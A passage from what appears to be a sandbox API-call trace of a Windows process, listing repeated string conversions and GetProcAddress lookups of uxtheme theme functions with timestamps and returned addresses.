dwFlags=0x0, lpWideCharStr="GetThemePartSize", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0039.636] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePartSize", cchWideChar=16, lpMultiByteStr=0x71dff9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePartSize", lpUsedDefaultChar=0x0) returned 16 [0039.637] GetProcAddress (hModule=0x74090000, lpProcName="GetThemePartSize") returned 0x7409cdb1 [0039.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextExtent", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0039.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextExtent", cchWideChar=18, lpMultiByteStr=0x71dff9c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeTextExtent", lpUsedDefaultChar=0x0) returned 18 [0039.637] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeTextExtent") returned 0x74092d57 [0039.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextMetrics", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0039.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextMetrics", cchWideChar=19, lpMultiByteStr=0x71dff9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeTextMetrics", lpUsedDefaultChar=0x0) returned 19 [0039.638] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeTextMetrics") returned 0x7409f992 [0039.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundRegion", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundRegion", cchWideChar=24, lpMultiByteStr=0x71e6c6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundRegion", lpUsedDefaultChar=0x0) returned 24 [0039.638] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeBackgroundRegion") returned 0x740a165d [0039.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HitTestThemeBackground", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0039.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HitTestThemeBackground", cchWideChar=22, lpMultiByteStr=0x71dff9c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HitTestThemeBackground", lpUsedDefaultChar=0x0) returned 22 [0039.639] GetProcAddress (hModule=0x74090000, lpProcName="HitTestThemeBackground") returned 0x740a3ce3 [0039.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeEdge", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeEdge", cchWideChar=13, lpMultiByteStr=0x71ca1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeEdge", lpUsedDefaultChar=0x0) returned 13 [0039.639] GetProcAddress (hModule=0x74090000, lpProcName="DrawThemeEdge") returned 0x740b3b52 [0039.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeIcon", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeIcon", cchWideChar=13, lpMultiByteStr=0x71ca1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeIcon", lpUsedDefaultChar=0x0) returned 13 [0039.640] GetProcAddress (hModule=0x74090000, lpProcName="DrawThemeIcon") returned 0x740c35e7 [0039.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemePartDefined", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0039.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemePartDefined", cchWideChar=18, lpMultiByteStr=0x71dff9c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemePartDefined", lpUsedDefaultChar=0x0) returned 18 [0039.640] GetProcAddress (hModule=0x74090000, lpProcName="IsThemePartDefined") returned 0x740985b4 [0039.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeBackgroundPartiallyTransparent", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0039.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeBackgroundPartiallyTransparent", cchWideChar=37, lpMultiByteStr=0x71fc454, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeBackgroundPartiallyTransparent", lpUsedDefaultChar=0x0) returned 37 [0039.641] GetProcAddress (hModule=0x74090000, lpProcName="IsThemeBackgroundPartiallyTransparent") returned 0x740960ab [0039.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeColor", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeColor", cchWideChar=13, lpMultiByteStr=0x71ca1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeColor", lpUsedDefaultChar=0x0) returned 13 [0039.642] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeColor") returned 0x7409616c [0039.642] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMetric", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.642] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMetric", cchWideChar=14, lpMultiByteStr=0x71ca1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeMetric", lpUsedDefaultChar=0x0) returned 14 [0039.642] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeMetric") returned 0x740a06e2 [0039.642] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeString", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.642] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeString", cchWideChar=14, lpMultiByteStr=0x71ca1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeString", lpUsedDefaultChar=0x0) returned 14 [0039.643] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeString") returned 0x740c22e4 [0039.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBool", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBool", cchWideChar=12, lpMultiByteStr=0x71ca1dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBool", lpUsedDefaultChar=0x0) returned 12 [0039.643] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeBool") returned 0x74097c1f [0039.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeInt", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeInt", cchWideChar=11, lpMultiByteStr=0x71ca1dc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeInt", lpUsedDefaultChar=0x0) returned 11 [0039.644] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeInt") returned 0x7409616c [0039.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeEnumValue", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0039.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeEnumValue", cchWideChar=17, lpMultiByteStr=0x71dff9c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeEnumValue", lpUsedDefaultChar=0x0) returned 17 [0039.645] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeEnumValue") returned 0x7409616c [0039.645] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePosition", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0039.645] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePosition", cchWideChar=16, lpMultiByteStr=0x71dff9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePosition", lpUsedDefaultChar=0x0) returned 16 [0039.645] GetProcAddress (hModule=0x74090000, lpProcName="GetThemePosition") returned 0x740c2350 [0039.645] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFont", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.645] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFont", cchWideChar=12, lpMultiByteStr=0x71ca1dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeFont", lpUsedDefaultChar=0x0) returned 12 [0039.646] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeFont") returned 0x7409ff21 [0039.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeRect", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeRect", cchWideChar=12, lpMultiByteStr=0x71ca1dc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeRect", lpUsedDefaultChar=0x0) returned 12 [0039.646] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeRect") returned 0x740a3611 [0039.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMargins", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0039.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMargins", cchWideChar=15, lpMultiByteStr=0x71ca1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeMargins", lpUsedDefaultChar=0x0) returned 15 [0039.647] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeMargins") returned 0x740986e9 [0039.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeIntList", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0039.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeIntList", cchWideChar=15, lpMultiByteStr=0x71ca1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeIntList", lpUsedDefaultChar=0x0) returned 15 [0039.647] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeIntList") returned 0x740c23b1 [0039.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePropertyOrigin", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0039.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePropertyOrigin", cchWideChar=22, lpMultiByteStr=0x71dff9c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePropertyOrigin", lpUsedDefaultChar=0x0) returned 22 [0039.648] GetProcAddress (hModule=0x74090000, lpProcName="GetThemePropertyOrigin") returned 0x740b3fbb [0039.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowTheme", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowTheme", cchWideChar=14, lpMultiByteStr=0x71ca1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetWindowTheme", lpUsedDefaultChar=0x0) returned 14 [0039.648] GetProcAddress (hModule=0x74090000, lpProcName="SetWindowTheme") returned 0x740a0134 [0039.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFilename", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0039.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFilename", cchWideChar=16, lpMultiByteStr=0x71dff9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeFilename", lpUsedDefaultChar=0x0) returned 16 [0039.649] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeFilename") returned 0x740c2412 [0039.649] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColor", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0039.649] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColor", cchWideChar=16, lpMultiByteStr=0x71dff9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysColor", lpUsedDefaultChar=0x0) returned 16 [0039.650] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeSysColor") returned 0x740b3274 [0039.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColorBrush", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColorBrush", cchWideChar=21, lpMultiByteStr=0x71dff9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysColorBrush", lpUsedDefaultChar=0x0) returned 21 [0039.650] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeSysColorBrush") returned 0x740c301e [0039.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysBool", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0039.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysBool", cchWideChar=15, lpMultiByteStr=0x71ca1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysBool", lpUsedDefaultChar=0x0) returned 15 [0039.651] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeSysBool") returned 0x740c3172 [0039.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysSize", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0039.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysSize", cchWideChar=15, lpMultiByteStr=0x71ca1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysSize", lpUsedDefaultChar=0x0) returned 15 [0039.651] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeSysSize") returned 0x740c320b [0039.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysFont", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0039.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysFont", cchWideChar=15, lpMultiByteStr=0x71ca1dc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysFont", lpUsedDefaultChar=0x0) returned 15 [0039.652] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeSysFont") returned 0x740c29c4 [0039.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysString", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0039.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysString", cchWideChar=17, lpMultiByteStr=0x71dff9c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysString", lpUsedDefaultChar=0x0) returned 17 [0039.652] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeSysString") returned 0x740c2b3f [0039.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysInt", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysInt", cchWideChar=14, lpMultiByteStr=0x71ca1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysInt", lpUsedDefaultChar=0x0) returned 14 [0039.653] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeSysInt") returned 0x740c2bd3 [0039.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeActive", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeActive", cchWideChar=13, lpMultiByteStr=0x71ca1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeActive", lpUsedDefaultChar=0x0) returned 13 [0039.653] GetProcAddress (hModule=0x74090000, lpProcName="IsThemeActive") returned 0x7409f785 [0039.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsAppThemed", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsAppThemed", cchWideChar=11, lpMultiByteStr=0x71ca1dc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsAppThemed", lpUsedDefaultChar=0x0) returned 11 [0039.654] GetProcAddress (hModule=0x74090000, lpProcName="IsAppThemed") returned 0x7409f869 [0039.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetWindowTheme", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetWindowTheme", cchWideChar=14, lpMultiByteStr=0x71ca1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetWindowTheme", lpUsedDefaultChar=0x0) returned 14 [0039.654] GetProcAddress (hModule=0x74090000, lpProcName="GetWindowTheme") returned 0x7409df46 [0039.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableThemeDialogTexture", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableThemeDialogTexture", cchWideChar=24, lpMultiByteStr=0x71e6c6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnableThemeDialogTexture", lpUsedDefaultChar=0x0) returned 24 [0039.655] GetProcAddress (hModule=0x74090000, lpProcName="EnableThemeDialogTexture") returned 0x7409fcaf [0039.655] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeDialogTextureEnabled", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0039.655] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeDialogTextureEnabled", cchWideChar=27, lpMultiByteStr=0x71e6c6c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeDialogTextureEnabled", lpUsedDefaultChar=0x0) returned 27 [0039.655] GetProcAddress (hModule=0x74090000, lpProcName="IsThemeDialogTextureEnabled") returned 0x740c312b [0039.655] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.655] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x71dff9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeAppProperties", lpUsedDefaultChar=0x0) returned 21 [0039.656] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeAppProperties") returned 0x740a0fb1 [0039.656] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.656] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x71dff9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetThemeAppProperties", lpUsedDefaultChar=0x0) returned 21 [0039.656] GetProcAddress (hModule=0x74090000, lpProcName="SetThemeAppProperties") returned 0x740c3296 [0039.656] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetCurrentThemeName", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0039.656] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetCurrentThemeName", cchWideChar=19, lpMultiByteStr=0x71dff9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentThemeName", lpUsedDefaultChar=0x0) returned 19 [0039.657] GetProcAddress (hModule=0x74090000, lpProcName="GetCurrentThemeName") returned 0x740a05dd [0039.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeDocumentationProperty", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0039.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeDocumentationProperty", cchWideChar=29, lpMultiByteStr=0x71e6c6c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeDocumentationProperty", lpUsedDefaultChar=0x0) returned 29 [0039.657] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeDocumentationProperty") returned 0x740c2932 [0039.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeParentBackground", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0039.657] WideCharToMultiByte (in: CodePage=0x4e4, 